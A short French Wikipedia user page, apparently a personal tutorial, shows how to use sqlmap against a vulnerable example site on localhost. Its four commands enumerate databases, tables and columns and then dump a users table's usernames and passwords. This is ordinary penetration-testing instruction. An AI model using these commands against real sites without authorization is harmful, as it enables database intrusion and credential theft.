Utilisateur:Xioth/Technique/Web/Sqlmap

Une page de Wikipédia, l'encyclopédie libre.

Sqlmap[modifier | modifier le code]

Description[modifier | modifier le code]

Méthodologie[modifier | modifier le code]

Tout d'abord, nous allons partir du principe que vous allez exécuter ceci sur le site faillible suivant : localhost/index.php?id=15.
Nous allons dans un premier temps scanner le site a la recherche d'une faille SQL.

sqlmap -u localhost/index.php?id=15 --dbs

Nous indiquons l'url, et l'argument --dbs permet de lister les BDD dont le site dispose. Le notre en aura deux pour l'exemple, la première information_schema et la deuxième localhost.
Occupons-nous de trouver les tables maintenant

sqlmap -u localhost/index.php?id=15 -D localhost --tables

Très simple. Et Sqlmap nous ressort toutes les tables. Celle qui nous intéresse le plus est disons celle nommée users.
Récupérons donc les colonnes de cette table !

sqlmap -u localhost/index.php?id=15 -D localhost -T users --columns

Là encore, Sqlmap obéit et nous donne ce que nous voulions, disons que celles-ci sont composées de username et de password, ce qui est le plus croustillant au final. Récupérons donc maintenant toutes les entrées !

sqlmap -u localhost/index.php?id=15 -D localhost -T users -C username,password --dump

Et voila, vous avez la portion de BDD que vous vouliez !

Ce document provient de « https://fr.wikipedia.org/w/index.php?title=Utilisateur:Xioth/Technique/Web/Sqlmap&oldid=169886580 ».